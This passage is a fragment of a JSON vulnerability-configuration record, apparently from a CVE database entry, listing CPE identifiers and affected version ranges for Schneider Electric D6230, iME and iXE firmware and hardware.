"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6230_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6230:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6230l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6230l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-b1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-b1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-b1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-b1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-b1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-b1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-b1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-b1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-b1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-b1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-b1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-b1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixes1_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixes1:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixe11_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixe11:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixe21_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixe21:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixe31_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixe31:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
